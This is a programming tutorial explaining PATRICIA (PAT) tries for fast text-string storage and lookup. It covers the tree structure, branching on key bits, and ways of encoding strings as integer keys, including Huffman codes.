Later on OWIN came around as an interface between applications and web servers. Microsoft wrote Katana as one OWIN implementation that could host ASP.NET Web API, SignalR and other third-party frameworks on top of several servers, including IIS and IIS Express, Katana's self-host server and custom hosts.
ASP.NET Core is host-agnostic in the same manner as Katana and OWIN and any ASP.NET Core application can be hosted on IIS, IIS Express or self-hosted in your own process. Adding to that ASP.NET Core will include a web server for iOS and Linux based operating systems called Kestrel built on libuv.
ASP.NET Core introduces a new HTTP request pipeline that is modular so you can add only the components that you need. The pipeline is also no longer dependent on System.Web. By reducing the overhead in the pipeline, your app can experience better performance and better-tuned HTTP stacks. The new pipeline is based on much of what was learned from the Katana project and also supports OWIN.
Another cool feature in Visual Studio 2015 is the ability to do dynamic compilation. In the previous versions of ASP.NET, when we change code in our application, we are required to compile and build the application every time we want to see the changes. In the new version of Visual Studio there's no need to do those extra steps anymore, instead you just need to save the file that you are modifying and then refresh the browser to see the changes.
Here's the output after refreshing the browser:
In previous versions of MVC and Web API, working with attribute routing may cause some troubles, especially if you are doing some code refactoring. This is because the route always had to be specified as a string, so whenever you changed the name of the controller you would always need to change the string in the route attribute too.
MVC Core introduces the new [controller] and [action] tokens that can resolve this kind of issue. Here's an excellent article that highlights the use of these new tokens: ASP.NET MVC 6 Attribute Routing.
ASP.NET Core has built-in support for Dependency Injection and the Service Locator pattern. This means that you no longer need to rely on third-party Dependency Injection frameworks such as Ninject or AutoFac.
Visual Studio 2015 has built-in support for these popular open-source web development tools. Grunt and Gulp are task runners that help you automate your web development work flow. You can use both for compiling or minifying JavaScript files. Bower is a package manager for client-side libraries, including CSS and JavaScript libraries.
AngularJs is one of the most popular client-side frameworks for building Single Page Applications (SPAs). Visual Studio 2015 includes templates for creating AngularJs modules, controllers, directives and factories.
The support in ASP.NET Core for GruntJS makes ASP.NET an excellent server-side framework for building client-side AngularJs apps. You can combine and minify all of your AngularJs files automatically whenever you do a build. Check my examples about getting started with Angular and Angular2 in ASP.NET Core:
ASP.NET Core will also be the basis for SignalR 3. This enables you to add real time functionality to cloud connected applications. Check my previous SignalR example here: ASP.Net SignalR: Building a Simple Real-Time Chat Application
In ASP.NET Core, the messy web.config file is being replaced with the new cloud-ready configuration file called “config.json”. Microsoft wanted us developers to deploy apps in the cloud easier and have the app automatically read the correct configuration values for specific environment. Here's an example of how the new config file looks like:
Since everything in ASP.NET Core is pluggable you need to configure the source for the configuration at the Startup class like:
public Startup(IHostingEnvironment env)
{
var builder = new ConfigurationBuilder()
.SetBasePath(env.ContentRootPath);
builder.AddEnvironmentVariables();
Configuration = builder.Build();
}
public IConfigurationRoot Configuration { get; }
public void ConfigureServices(IServiceCollection services)
{
services.AddMvc();
services.AddTransient<MVC6Demo.Models.HeroStats>();
}
public void Configure(IApplicationBuilder app)
{
app.UseDeveloperExceptionPage();
app.UseMvc(m => {
m.MapRoute(
name: "default",
template: "{controller}/{action}/{id?}",
defaults: new { controller = "Home", action="Index"});
});
}
In previous versions of ASP.NET MVC, the default testing framework was the Visual Studio Unit Testing Framework (sometimes called mstest). This framework uses the [TestClass] and [TestMethod] attributes to describe a unit test.
ASP.NET Core uses xUnit.net as its unit test framework. This framework uses the [Fact] attribute instead of the [TestMethod] attribute and eliminates the need for the [TestClass] attribute.
Yes, ASP.NET Core as an open source project on GitHub. You can view the code, see when changes were made, download the code and submit changes.
I would agree that open-sourcing .NET makes good sense. It makes good business sense and good community sense. A big thanks to Microsoft. Job well done!
I hope someone find this article useful. :)
In this article we've learned some of the new cool features and concepts in ASP.NET Core. | https://www.codeproject.com/articles/1104668/introducing-asp-net-core-the-new-asp-net-in-town | CC-MAIN-2017-04 | refinedweb | 2,277 | 59.8 |
Hello, I'm rather new at C++ and I was wondering if you guys could help me out with something I'm trying to do. What I want to do is make it so when I type something like "apple" the cmd comes back and picks a random word that I supply it to say.
Also how could I make it so I can keep typing words in after I get one answer, I want to be able to just keep telling it words without the CMD going "Press any key to continue" and exiting out. Thanks for any help! This is the only code I have so far:
Code:// Random Words #include <iostream> #include <cmath> void myfun (int); int main () { using namespace std; cout << endl; cout << endl; cout << "You: "; int userinput; cin >> userinput; myfun(userinput); system("pause"); return 0; } void myfun(int x) { using namespace std; cout << endl; cout << "Your Computer: apple" << endl; cout << endl; } | http://cboard.cprogramming.com/cplusplus-programming/134267-how-can-i-make-random-answers-user-inputs-cplusplus.html | CC-MAIN-2016-18 | refinedweb | 156 | 66.2 |
Given
scala> def method(x: Int) = x
method: (x: Int)Int
scala> val func = (x: Int) => x
func: Int => Int = <function1>
scala> method _
res0: Int => Int = <function1>
scala> func(_)
res1: Int => Int = <function1>
scala> func _
res2: () => Int => Int = <function0>
res0
res1
(x) => func(x)
res2
This is actually a bit tricky. First, let's see what happens outside REPL:
It doesn't work when
func is a local variable:
object Main extends App { def foo() = { val f = (_: Int) + 1 f _ } println(foo()) } [error] /tmp/rendereraEZGWf9f1Q/src/main/scala/test.scala:8: _ must follow method; cannot follow Int => Int [error] f _ [error] ^
But if you put it outside
def foo, it compiles:
object Main extends App { val f = (_: Int) + 1 val f1 = f _ println(f1) }
because
f is both a field of
Main and a method without arguments which returns the value of this field.
The final piece is that REPL wraps each line into an object (because Scala doesn't allow code to appear outside a trait/class/object), so
scala> val func = (x: Int) => x func: Int => Int = <function1>
is really something like
object Line1 { val func = (x: Int) => x } import Line1._ // print result
So
func on the next line refers to
Line1.func which is a method and so can be eta-expanded. | https://codedump.io/share/nhJzQAPNI4os/1/underscore-after-function | CC-MAIN-2018-17 | refinedweb | 225 | 62.35 |
You may have heard about our foray into writing a native app using Elm Native UI. Purple Train accomplishes its goals quite well for us. It’s not only a useful product, it’s also a learning experience for us. We decided that it’s only fair for us to try to push the boundaries of the technology.
After we submitted the first Elm version to the Apple App Store, I entered what I thought would be a simple issue on the project: when you open the Stop Picker, it should be scrolled to the stop that’s selected instead of being at the top of the list. It became a prime example of why you should not tell a developer that something is “just a small change”.
Imperativeness in a land of Declarations
The biggest problem is that when the Stop Picker opens, we want code to execute that affects the state of the UI. The Elm Architecture builds its UIs in a declarative manner. You say “There’s a scroll view here and it contains a list of buttons” and the display layer takes care of laying that out on the screen for you. There’s no place to say “When the box is displayed, execute this code”.
In order to get this to work, we decided to play nice with declarations instead
of trying to fight them. We wanted a way to declare that a given element should
be marked as the scroll target when the box is rendered. You’ve undoubtedly seen
this pattern when using a loop to generate some HTML
<option> tags and one is
<option selected="true">. We had to make the function that generates the
button be able to tell if it’s the selected one. We also had to be able to pass
the selected button down the chain so the function can figure that out.
The code to generate a button in the Stop Picker originally looked like this:
stopButton : Stop -> Node Msg stopButton stop = pickerButton (PickStop stop) stop
Where
pickerButton called
Element.touchableHighlight to create the button
and
PickStop stop is the message we send our event loop.
We changed the
stopButton function to this:
stopButton : Maybe Stop -> Stop -> Node Msg stopButton highlightStop stop = case highlightStop of Nothing -> pickerButton (PickStop stop) stop Just pickedStop -> if stop == pickedStop then highlightPickerButton (PickStop stop) stop else pickerButton (PickStop stop) stop
And we pass in the already-selected stop or
Nothing if there isn’t one.
The main difference between
pickerButton and
highlightPickerButton is that
they pass a
scrollTarget property to the
touchableHighlight call. This lets
the underlying component know where it should scroll to on load.
This whole setup lets us define what’s special about the situation using Elm
instead of using JS. We tried a few ways of letting Elm handle React Native’s
componentDidMount callback, but ultimately had to fall back to JavaScript.
The State of the UI
Since Elm Native UI is built on top of React Native, it’s possible to drop down into that more imperative land of JavaScript to do things we can’t do (or, at least, we haven’t yet specified a way to do) in Elm. Thankfully, since Elm compiles to JavaScript, it’s rather straightforward to craft some JavaScript code that Elm is able to use.
What we need here is a React component that knows that it needs to find and
scroll to a sub-element once it’s mounted into the UI. We’ll need to hook into
the
componentDidMount callback because we need values (height, specifically)
from the rendered state of the component.
In the file
app/Native/ScrollWrapper.js, we created a component subclass that
looks like this:
const _user$project$Native_ScrollWrapper = function () { var ScrollView = require('ScrollView'); class ScrollWrapper extends ScrollView { componentDidMount() { // Find the child node that has the `scrollTarget` property // Scroll to that node with `this.scrollTo();` } } return { view: ScrollWrapper }; }();
Because we named the
const “
_user$project$Native_ScrollWrapper”, we’ll be
accessing it in Elm as
Native.ScrollWrapper. We also need this Elm code in
app/ScrollWrapper.elm:
module ScrollWrapper exposing (view) import NativeUi exposing (Node, Property) import Native.ScrollWrapper view : List (Property msg) -> List (Node msg) -> Node msg view = NativeUi.customNode "ScrollWrapper" Native.ScrollWrapper.view
Once we have this in place, we can
import ScrollWrapper in our Elm view and we
can replace the call to
Element.scrollView with
ScrollWrapper.view.
Now that all this is in place, we can refresh the app in the iOS Simulator and see the results:
Getting Things Done
I admit, this isn’t the best thing to have to do. I’d much prefer that we can specify this kind of extension in pure Elm. That’s the point of writing Elm, after all. But it’s very useful that we can interact with JavaScript in this way. Even if we could write new functionality to extend the framework in Elm, there is a lot of existing code written in JavaScript that could be very useful to include in a project. It’s comforting to know that it’s fairly easy to access should we need it. | https://thoughtbot.com/blog/extending-elm-native-ui-with-javascript | CC-MAIN-2019-35 | refinedweb | 858 | 59.84 |
The.
Introduction
The objective of this post is to explain how to execute MicroPython scripts using the uPyCraft IDE. If you haven’t yet set up and tested uPyCraft, please consult this previous post.
Although we have access to the MicroPython prompt to send commands, writing an application is much more convenient if we can write our MicroPython code in a file and then execute it. This is what we are going to do in this simple example.
The tests of this ESP32 tutorial were performed using a DFRobot’s ESP-WROOM-32 device integrated in a ESP32 FireBeetle board.
Testing the procedure
In order to execute a MicroPython script, we will need to create a new file where we will write our script’s code. To create a new file, we just need to click the button highlighted in figure 1, on the uPyCraft IDE.
Figure 1 – Creating a new MicroPython script file.
After clicking the button, a new file tab should appear, as indicated in figure 2. There, we can write our MicroPython script to later run on the ESP32.
Figure 2 – uPyCraft script editor.
The script we are going to write is a very simple hello world message and is shown bellow. You can copy and past to try it on your environment.
print ("Hello world from script")
Then, we need to save the file, so we can upload it to the ESP32 board. To do so, just click the icon highlighted in figure 3 and specify a name in the popup window. Finally, click the “ok” button.
Figure 3 – Saving the MicroPython script file.
Now, to upload the file, just click the icon highlighted in figure 4. It should connect to the MicroPython prompt. If you haven’t yet done the initial board configuration and flashing of the MicroPython firmware, please consult this previous post.
Figure 4 – Connecting to the MicroPython prompt.
Finally, just hit the upload button, indicated in figure 5. After that, the script should get uploaded to the ESP32 and after that the script will run, showing the output on the prompt at the bottom of the IDE window.
Figure 5 – Successful upload and execution of MicroPython script file.
Note that the file with the script will be uploaded to the ESP32 and thus will be persisted on the file system. To confirm that, we just need to go to the prompt and send the following commands:
import os os.listdir()
As indicated in figure 6, the testScript.py file we uploaded is persisted on the file system and will stay there even after disconnecting from the board.
Figure 6 – Script file persisted on file system of the ESP32.
We can re-run the file from the prompt just by importing its content with the command shown bellow:
import testScript
We should get the same print we obtained before after uploading the file, as indicated in figure 7.
Figure 7 – Re-running the script file uploaded to the ESP32.
If you don’t want to leave the uploaded file in the file system, you can simply send the following command to delete it, assuming a previous import of the os module, as we did before:
os.remove('testScript.py')
Figure 8 illustrates the removal of the previously uploaded file. Note that in that example I’ve disconnected the board and connected again, just to confirm that the file stays in the file system.
Figure 8 – Removal of the previously uploaded script file. | https://techtutorialsx.com/2017/07/22/esp32-micropython-executing-scripts-with-upycraft/ | CC-MAIN-2017-34 | refinedweb | 579 | 63.59 |
One of the most fundamental of web development is user registration form. Every website must have sign up, sign in form. This is the basic thing. In this article i am going to cover about django user registration form.
You must have created django super user using command line, and super user can go to admin dashboard. but this is different. Not everyone can access admin dashboard and we can’t create 100 or more than 100 user using command line.
This is where sign up form is helpful. People can create an account using this sign up page.
Django User Registration Form :
Assumptions :
You know
1. how to create django project.
2. Create super user.
3. Basics of django.
4. creating an app in django.
1.) Create New Application:
First thing you can do is create a new application, inside your project. Create a new app accounts.
Command is : python manage.py startapp accounts
After creating accounts app, we must register this accounts app in INSTALLED_APPS in settings file.
just write ‘accounts’ inside INSTALLED_APPS.
settings.py file
INSTALLED_APPS = [ 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', 'admission', 'password_generator', 'demo', 'crispy_forms', 'accounts', ]
2. Create a Sign Up page :
First step after creating accounts app and adding accounts app in settings file. First thing we need to do is create a forms.py file inside accounts app.
whenever you are trying to create sign up page, you must have some properties, like Username, First Name, Last Name, Email, Password and confirm password.
Django gives all these things we just need to call them. We don’t have to do any extra work, unless we want to.
Add the following code in forms.py file.
# forms.py from django import forms from django.contrib.auth.forms import UserCreationForm from django.contrib.auth.models import User class RegisterForm(UserCreationForm): email = forms.EmailField() class Meta: model = User fields = ["username", "first_name", "last_name", "email", "password1", "password2"]
We have modified the django default sign up page and we have added email field in that. If you want to add more things you can always add it. you just need to write inside ‘fields’ and define them as class variable . you can put anywhere inside fields, it depends upon you, where you want to show.
I am not going to explain each and every detail like what is UserCreationForm, where did it come from. You have to search in google about these things, this good practice.
Now we need to add a function inside our views.py file. Open views.py and add the following code.
from django.shortcuts import render, redirect from .forms import RegisterForm def register(request): if request.method == "POST": form = RegisterForm(request.POST) if form.is_valid(): form.save() return redirect("/accounts/") else: form = RegisterForm() return render(request, "accounts/register.html", {"form": form})
Before going to templates, you must configure, urls.py of your project and your app.
Go to your project’s urls.py and add the code, that redirects to app url.
Main urls.py .
from django.contrib import admin from django.urls import path, include urlpatterns = [ path('admin/', admin.site.urls), path('password/', include('password_generator.urls')), path('accounts/', include('accounts.urls')), # add this line of code in your file ]
Now go to your accounts app and create a file named urls.py and add the following lines.
accounts/urls.py
from django.urls import path, include from . import views urlpatterns = [ path("", views.register, name="register") ]
Now you can go to template thing. You must know how templates are rendered in django. You first create a folder name templates inside your accounts app. After that you create another folder inside templates folder named accounts. Than create register.html .
Structure looks like this :
accounts/templates/accounts/register.html
<!DOCTYPE html> <html lang="en">
Signup page looks like this, without styling, just bootstrap for sign up button.
go to the address :
Our Sign up page is done. fill the form and click on Register . Congrats you successfully created Django Registration Form.
Now to style this django user registration from, we need to install crispy forms.
Install Crispy Forms :
pip install django-crispy-forms
after installing crispy forms, to settings —> INSTALLED_APPS and than write ‘crispy_forms’ .
INSTALLED_APPS = [ 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', 'password_generator', 'crispy_forms', # add this to your file. 'accounts', ]
After that add this following text in your settings file, after static url.
CRISPY_TEMPLATE_PACK = "bootstrap4"
Now the final part.
in register.html you wrote {{ form }} . we need to change that to {{ form|crispy }} , and you have to write
{% load crispy_forms_tags %} <!doctype HTML>
And
Inside <form> .
{% csrf_token %} {{ form|crispy }}
Final Product looks like this.
You can always change the design of your sign up form. Next tutorial will be Log in page and log out page.
Conclusion: Django User Registration Form
This is the basic of django user registration form. There is always a more. Next tutorial will be log in form and log out page. If you find any error please feel free to correct. That will be an honour. Thank you for reading this.
Also Read : Best Python IDE | You must use.
Also Read : Python anywhere | Host Python application | http://www.geekyshadow.com/2020/06/21/django-user-registration-form/ | CC-MAIN-2020-40 | refinedweb | 876 | 62.14 |
preface
Recently, I am making a small thing, which is a desktop client tool based on electronic Vue. As I am a pure back-end development, my knowledge of the front-end is still basic JS, jQuery, etc., so don’t spray on the front-end gods~
scene
As the project is a single page application, it is necessary to record some status information after logging in, so as to refresh the page data when the data is updated
The first time you use electronic and Vue, you don’t have a deep understanding of Vue based on the principle that the simpler the better. After you understand the basic use, you start to develop. So, you write all the information you want to record in sessionstorage
Although this method is simple, it is unreasonable to write the state or the information to be transmitted in the session after all. Later, I came into contact with vuex, so I will record the whole use process here
What is vuex
Vuex is a Vue.js State management mode of application development. It uses centralized storage to manage the state of all components of the application, and ensures that the state changes in a predictable way with corresponding rules.
The above is the introduction of the official website. Please refer to the official website of vuex for specific information
Electron Vue integration vuex
- Preconditions
This project is a standard structural engineering based on the CLI generation of electron Vue
- Under Src / store / modules, add the store JS file belonging to the respective module. In this case, it is defined as User.js
Define variables getters (in order to get values in the page) that need to record state in the file
const state = { Bucket ID: '{bucket ID}' // default value } const getters = { bucketId: state=> state.bucketId } const mutations = { updateBucketId(state, bucketId) { state.bucketId = bucketId } } export default { state, mutations }
In the Vue file where we need to get the state value, we add the following:
export default { computed: { bucketId() { return this.$store.state.User.bucketId } }, }
Here’s how to use variables:
<span style="float:right">{{ username }}</span>
Note: the user should be the same as the file name of the variable, which is actually the name of the module
How to update variables: if we are in the Vue file, we can directly use the following methods
this.$store.commit('updateBucketId', response.data[index].bucketId)
If we want to use it in the tool JS, here’s how
import store from '../store' store.commit('updateBucketId', '1111111')
As of now, the simple use of electronic Vue and vuex is over. Because it is also an experimental and learning demo, it is more about how to use it | https://developpaper.com/electron-vue-simple-integration-vuex/ | CC-MAIN-2020-24 | refinedweb | 452 | 55.88 |
Re: Unsubscribing
- From: "Mark Haney" <mhaney@xxxxxxxxxxxxxxxx>
- Date: Wed, 03 Sep 2008 08:56:05 -0400
Chris Jeffries wrote:
I don't complain that my issues have not been addressed - if no-one
knows anything to help, fair enough.
What has pissed me off is that 90% of what I have looked through is
either 'experts' slagging off people who are seeking help because they
are not expert enough in how they ask the question (we all had to take
our first step sometime) or everyone else piling in to slag off the
person who slagged off the newbie - and so it goes on. There's just too
much chaff and not enough wheat.
Hopefully I can find more productive places to find support when I need
it. If not, maybe I will return (reluctantly) to Windows.
Bye guys.
90%? I don't think so. For the most part, people here are very nice
and helpful. But, like anything there are a few who aren't. As for the
last little issue we had, that was caused by nothing more than a troll.
You'll see those everywhere, no matter what list you join.
As for me, (and I"m sure the 'experts' comment was directed at me
mostly), I am quite aware we all had to start somewhere. But nowhere
else do you see a person say 'it's broke, fix it' and expect the
'experts' to pull a fix out of their butts without knowing the problem.
How many times have you gone to have your car looked at and NOT
explained what the symptoms are? That's all we ask. I'd rather be
inundated with too much info, rather than not enough. Is that so hard
to ask?
I will also say this. In my case, I am on over a dozen lists. Most of
which get a couple mails a day. Over the years I've managed to get
pretty good at condensing things down to a manageable level. But it's a
LOT of data to sift through over the course of a day. And, in a good
many cases, I know I've overlooked threads and had my threads over
looked. In that case, you need to re-submit the problem, maybe in
bolder type, just to get it back in our minds. It happens. There are
too few people on these lists who know a little bit of everything to be
able to catch everything that comes through. That's why I am such an
advocate for teaching as I help fix a problem. And push for getting
people to experiment on their own. The more people who become
knowledgeable, the less demand is placed on us 'experts'.
I'm not here to hold anyone's hand. I'm here to help you begin to
figure things out on your own. You know the parable about teaching a
man to fish, etc. That's what these lists needs.
I hate to see you go, hopefully you'll move to another linux distro or
list. But, honestly, even in the Windows lists, you'll find the same
problems.
--
Libenter homines id quod volunt credunt -- Caius Julius Caesar
Mark Haney
Sr. Systems Administrator
ERC Broadband
(828) 350-2415
Call (866) ERC-7110 for after hours support
--
ubuntu-users mailing list
ubuntu-users@xxxxxxxxxxxxxxxx
Modify settings or unsubscribe at:
- References:
- Unsubscribing
- From: Chris Jeffries
- Prev by Date: Download manager with multiple downloading sessions
- Next by Date: Re: Unknown devise
- Previous by thread: Unsubscribing
- Next by thread: Re: Unsubscribing
- Index(es): | http://linux.derkeiler.com/Mailing-Lists/Ubuntu/2008-09/msg00232.html | CC-MAIN-2013-20 | refinedweb | 595 | 80.51 |
Pattern matching and Recursion in Scala
People coming from Java background , might have used switch case as a means to implement strategy pattern , or just for routing to a different workflow based on some flag value. Scala provides pattern matching on different types which fits into multiple scenarios. In this blog we will see how pattern matching can be leveraged to perform operations on a List using recursion.
Java switch case vs Scala pattern matching
In the below code, you can see a sample code for switch case to get the salary of employee with some side effects (obviously ;))
public int getSalary(int payCode) {
switch (payCode){
case 1 : emp.setEmployeeType(Type.ENGINEER)
break;
case 2 : emp.setEmployeeType(EmpType.TEAMLEAD)
break;
case 3 : emp.setEmployeeType(Type.ARCHITECT)
break;
default: emp.setEmployeeType(Type.DEFAULT)
break;
}
return calculateSalary(emp);
}
Here’s how we can reimplement the same in scala with pattern matching
def getSalary(payCode : Int) = payCode match {
case 1 => calculateSalary(emp.setEmployeeType(Type.ENGINEER))
case 2 => calculateSalary(emp.setEmployeeType(Type.TEAMLEAD))
case 3 => calculateSalary(emp.setEmployeeType(Type.ARCHITECT)) case _ => calculateSalary(emp.setEmployeeType(Type.DEFAULT))
}
Now that you have seen how switch case in java, maps to pattern matching in scala, let’s dive into using scala for performing operations on List .
Step 1. Create a list trait and the implement in case class
sealed trait MyList
case class Cons(head: Int,tail : MyList) extends MyList
case object Nil extends MyList
The above code demonstrates a simple trait which we have extended to in Cons class to provide a structure in the form of head and tail of a List. Now we will be creating a companion object which can be used to instantiate the List object in REPL.
Step 2. Create companion object
object MyList{
def apply(as : Int*):MyList = {
if(as.isEmpty) Nil else Cons(as.head,apply(as.tail:_*))
}
}
Step 3. Add a method in trait to sum all the numbers present in the List
Now that we have a List, we would want to write functions as part of the trait which will be invoked on the List object. Here’s a sumAll method which provides a summation of all the Integers present in the list.
def sumAll:Int = this match {
case Cons(h,t) => h + t.sumAll
case Nil => 0
}
The above code triggers the sumAll method on this, which refers to the current List object. The first case will do a pattern match on head and tail of the Cons data constructor and if the match found then it takes the head and recursively calls the sumAll method on the remaining tail which is also a List object. If there is no match which is the default case then 0 is returned.
Another ProductAll method in trait
def productAll : Int = this match{
case Cons(h,t) => h * t.productAll
case Nil => 1
}
Below is the complete code snippet.
Originally published at shadamez.wordpress.com on May 13, 2015. | https://medium.com/@shadamez/pattern-matching-and-recursion-in-scala-1b04294c8232 | CC-MAIN-2018-47 | refinedweb | 493 | 63.49 |
how can we find the absolute of a float variable since it gives warning of data loss?
Printable View
how can we find the absolute of a float variable since it gives warning of data loss?
Is abs() a member of std, I think it's not?Is abs() a member of std, I think it's not?Quote:
Originally posted by vVv
Code:
#include <cmath>
...
float foobar = -1.23;
foobar = std::abs( foobar );
And does any body know why does the compiler give that warning?
If you include cmath, the abs function is in the std namespace. I don't see anything wrong with it.
I asked about this because when I compiled the following code( using MS VC++ 6:
I got the following errors and warnings:I got the following errors and warnings:Code:
#include <cmath>
int main()
{
float foobar = -1.23;
foobar = std::abs( foobar );
return 0;
}
Thanks in advance...Thanks in advance...Quote:
--------------------Configuration: Cpp2 - Win32 Debug--------------------
Compiling...
Cpp2.cpp
C:\Documents and Settings\Ammar\My Documents\C++\Cpp2.cpp(6) : warning C4305: 'initializing' : truncation from 'const double' to 'float'
C:\Documents and Settings\Ammar\My Documents\C++\Cpp2.cpp(7) : error C2653: 'std' : is not a class or namespace name
C:\Documents and Settings\Ammar\My Documents\C++\Cpp2.cpp(7) : warning C4244: 'argument' : conversion from 'float' to 'int', possible loss of data
C:\Documents and Settings\Ammar\My Documents\C++\Cpp2.cpp(7) : warning C4244: '=' : conversion from 'int' to 'float', possible loss of data
Error executing cl.exe.
Cpp2.exe - 1 error(s), 3 warning(s)
>using MS VC++ 6
That's your problem, VC++ 6 doesn't conform to the latest standard properly.
-Prelude
Thanks alot, vVv and Prelude...
Now it's clear...
The abs( ) function takes an integer number and returns an integer value. You want to use the function fabs( ) which takes a double and returns a double.
Alternatively you can use fabs() defined in math.h, which has been created specifically for floating point arguements. | http://cboard.cprogramming.com/cplusplus-programming/32193-abs-float-printable-thread.html | CC-MAIN-2015-11 | refinedweb | 335 | 59.9 |
Red Hat Bugzilla – Bug 36539
sort goes into infinite loop with LC_ALL unset
Last modified: 2016-11-24 10:08:10 EST
From Bugzilla Helper:
User-Agent: Mozilla/4.77 [en] (X11; U; Linux 2.2.16-3 i686)
For specific input files (see attached file), the sort utility will go into
an infinite loop. I first noticed this problem when sorting a 404MB file,
and managed to reproduce the problem with a smaller input file using the
"-S 4" option. When I set LC_ALL=C, the problem does not appear.
Reproducible: Always
Steps to Reproduce:
1. Execute "sort -S 4 test1 -o test1.output" (program hangs--you can
examine temp files)
2. Execute "LC_ALL=C sort -S 4 test1 -o test1.output" (program is slow,
but finishes)
3.
Actual Results: For step 1, nothing happens.
For step 2, the sort utility finishes as expected.
Expected Results: The sort utility should finish successfully in both
cases.
I get the following when I interrupt the sort utility in gdb:
(gdb) cont
Continuing.
Program received signal SIGINT, Interrupt.
0x400a33a9 in strcoll () from /lib/libc.so.6
(gdb) where
#0 0x400a33a9 in strcoll () from /lib/libc.so.6
#1 0x0804ef62 in memcoll (s1=0x8057000 "0-0-0-0-0-0-0-0-0-0.COM.",
s1len=25,
s2=0x8056f78 "00000-00000.COM.", s2len=17) at memcoll.c:44
#2 0x0804b73a in compare (a=0x8057060, b=0x8056fd8) at sort.c:1410
#3 0x0804be3e in mergefps (fps=0xbfffd6c0, nfps=16, ofp=0x8056e08,
output_file=0x8057280 "/tmp/sortnm2z9d") at sort.c:1583
#4 0x0804c7c4 in merge (files=0x8056980, nfiles=288, ofp=0x8056810,
output_file=0xbffffc04 "zxcv") at sort.c:1758
#5 0x0804cd45 in sort (files=0x80567ac, nfiles=-1, ofp=0x8056810,
output_file=0xbffffc04 "zxcv") at sort.c:1863
#6 0x0804e231 in main (argc=6, argv=0xbffffabc) at sort.c:2459
#7 0x4003a237 in __libc_start_main () from /lib/libc.so.6
(gdb) Quit
Created attachment 15664 [details]
Test input file for sort failure
problem is still in textutils-2.0.13-1
Seems to be a problem with the strcoll() function.
Consider the following program:
#include <stdio.h>
#include <string.h>
#include <locale.h>
int main( int argc, char *argv[] )
{
char *t1 = "0-0-0-0-0-0-0-0-0-0.COM";
char *t2 = "00000-00000.COM";
setlocale( LC_ALL, "" );
printf( "strcoll( \"%s\", \"%s\" ) = %d\n", t1, t2, strcoll( t1, t2 ) );
printf( "strcoll( \"%s\", \"%s\" ) = %d\n", t2, t1, strcoll( t2, t1 ) );
}
Yields the output:
strcoll( "0-0-0-0-0-0-0-0-0-0.COM", "00000-00000.COM" ) = 1
strcoll( "00000-00000.COM", "0-0-0-0-0-0-0-0-0-0.COM" ) = 4
So when the sort utility is trying to merge the temporary files together in
mergefps(), it keeps swapping the same two entries corresponding to the test
samples above, as the first argument will ALWAYS be considered "greater" than
the second one, regardless of the order they are passed.
Will go digging through glibc unless someone else finds this one first...
I've checed into the CVS archive a patch to fix this problem. The fixed version
will be in 2.2.3.
Can this be included if an errata RPM is made of glibc-2.2.2? This affects lots
of other utilities in addition to "sort" like "ls", etc., etc.
It's fixed in rawhide and will be in the glibc errata we'll release in a while. | https://bugzilla.redhat.com/show_bug.cgi?id=36539 | CC-MAIN-2018-09 | refinedweb | 565 | 69.28 |
A while back, I was looking for a data structure that could store strings quickly and retrieve them very quickly. I stumbled upon the Patricia (PAT) trie ("Practical Algorithm To Retrieve Information Coded in Alphanumeric"). Unfortunately, I could not find a good enough explanation of the trie. Every explanation I read, glossed over too many details. Every code piece (there are not many) that I could find had very nice implementations, but did not store text only numbers. So, I wrote my own class that stores text.
If you want to store a good amount of unique text strings (duplicates can be handled, just not by the class itself), retrieve them super fast, and associate data or functions with them, then read on!
This class could be used for (as examples, but not limited to):
Not bad, huh?
I would like to give a brief overview of what a trie is and then speak about PAT tries more specifically. It is assumed you understand how a binary tree works.
A trie is a binary tree that uses key space decomposition (as opposed to object space decomposition). The idea is that instead of branching left or right based on what data value happens to be at a particular node in the tree (that is not a mistake, tries are trees), we branch based on predefined key values. So the root node of a tree could send the first thirteen letters of the alphabet to the left child while the others go to the right. This does not guarantee a balanced tree, but it helps to keep the tree balanced and ensures that the order in which data is input will not affect the performance of the data structure (i.e., insert a sorted list into a binary tree and end up with a list).
In a PAT trie, all of the internal nodes (a node with at least one child) hold only enough information to make branching decisions (go left or right), but no actual data. The leaves of the trie (a node with no children) hold the data: a key and a link to one class (that holds whatever we need it to).
My PAT trie uses integers (on a 32-bit machine) for keys. If you want to use a long for the key, then you must change the type of the key (keyType). If you change the type of the key or you compile this class on a machine that encodes integers (int) with more than 32 bits, then you must set the constant MAX_KEY_BITS to the number of bits that your data type is wide (default is 32). We will see later how to convert text to integers.
long
keyType
int
MAX_KEY_BITS
With PAT tries, at every level of the trie, we evaluate one bit of the key, and based on that bit, move left or right. To find any key in our trie, we only have to check at most the number of bits that our key is wide (32 bits).
The image above shows a PAT trie that stores a few keys (binary representation shown). The black circles are internal nodes. The yellow circles are leaf nodes.
Now, we turn our attention to making this a useful PAT trie. We need a way to turn a string of text into our key. All of the three methods described below are based on the fact that Unicode or ASCII characters are really just numbers. The character 'a' is also 97.
The first method involves converting all of our characters into 8-bit numbers (a byte) and concatenating them. There are only 26 letters in the alphabet; we can represent them with a byte. This is not a very good solution, because we could only discriminate against four letters (4 letters * 8 bits = 32 bits). Also, most of the branching would be on the same characters (eight bits to store an ASCII character, eight identical internal node checks).
The second method allows us to store more letters in our key. We could add our characters ('a' + 'e' + ... = 4532). In this way, with the largest ASCII character being no more than 255 (2^8-1) or in Unicode 65535 (2^16-1), we could have our key encode many numbers and we would not be wasting space on comparing eight internal nodes for one character. This method has one fatal flaw: encoding "was" or "saw" we will get the same number (3 + 5 = 5 + 3).
The last method uses a Huffman code. Huffman codes are primarily used for compression. They encode letters in a new format using the least amount of bits possible by assigning the least number of bits to the most frequent character. So, if 'e' is the most common letter in a document, then we will represent 'e' with a zero (or just one bit). We would represent the next most frequent letter with a one and the third most frequent with a two. In this way, the Huffman code saves the most space of the three methods, by replacing the most frequent letter with the smallest representation.
Please note that with any of these three methods, there is no guarantee that the generated key will be unique. If all of the letters are identical until the point where our key is full (we have represented as many characters as possible), then we will have generated the same key for two distinct strings ("a baby ate the fox" and "the baby ate the fox" will translate to the same key). To ease this issue, use a key with greater than 32 bits. With a 32 bit key, we can represent at most 32 characters (provided those characters can be represented by one bit ~ 32 e's or t's).
